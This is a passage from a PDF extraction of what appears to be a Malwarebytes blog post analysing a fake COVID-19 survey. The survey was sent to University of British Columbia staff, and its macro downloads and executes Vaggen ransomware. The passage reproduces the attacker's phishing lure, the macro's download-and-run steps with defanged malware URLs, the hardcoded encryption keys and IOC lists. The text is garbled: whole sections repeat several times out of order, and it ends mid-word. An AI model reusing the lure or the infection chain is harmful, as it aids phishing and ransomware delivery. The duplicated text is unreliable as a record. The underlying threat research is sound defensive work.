3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2292 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2293 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2294 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2295 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2296 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2297 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2298 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2299 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2300 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2301 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2302 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2303 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2304 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2305 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2306 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2307 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2308 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2309 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2310 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2311 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2312 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2313 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2314 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2315 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2316 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2317 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2318 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2319 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2320 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2321 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2322 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2323 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2324 of 3467\n\nUnusually low ransom amount\r\nBased 